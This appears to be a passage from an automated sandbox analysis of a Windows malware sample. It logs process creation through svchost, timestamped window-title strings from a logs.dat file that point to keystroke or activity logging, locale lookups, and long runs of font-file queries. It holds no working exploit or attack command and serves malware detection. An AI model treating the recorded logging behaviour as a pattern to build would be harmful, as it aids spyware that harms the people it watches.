                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: logs.dat.11.drBinary or memory string: [2025/01/04 12:43:45 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.drBinary or memory string: [2025/01/19 21:18:01 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, graias.exe, 0000000B.00000002.4171327260.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.drBinary or memory string: [2025/06/25 13:53:18 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, graias.exe, 0000000B.00000002.4171327260.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.drBinary or memory string: [2025/07/28 05:58:50 Program Manager]
                Source: logs.dat.11.drBinary or memory string: [2025/02/14 07:46:02 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.drBinary or memory string: [2025/01/04 12:42:41 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.drBinary or memory string: [2025/04/19 07:13:42 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.drBinary or memory string: [2025/06/04 08:29:04 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.drBinary or memory string: [2025/04/02 10:56:16 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.drBinary or memory string: [2025/07/17 03:41:29 Program Manager]
                Source: logs.dat.11.drBinary or memory string: [2025/01/04 12:42:23 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.drBinary or memory string: [2025/03/03 10:43:53 Program Manager]
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmp, graias.exe, 0000000B.00000002.4169480576.0000000000C6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.drBinary or memory string: [2025/05/06 21:27:14 Program Manager]
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00433E1A cpuid 3_2_00433E1A
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: GetLocaleInfoW,3_2_004510CA
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: EnumSystemLocalesW,3_2_004470BE
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_004511F3
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: GetLocaleInfoW,3_2_004512FA
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_004513C7
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: GetLocaleInfoW,3_2_004475A7
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: GetLocaleInfoA,3_2_0040E679
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_00450A8F
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: EnumSystemLocalesW,3_2_00450D52
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: EnumSystemLocalesW,3_2_00450D07
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: EnumSystemLocalesW,3_2_00450DED
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00450E7A
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Users\user\Desktop\4XYAW8PbZH.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
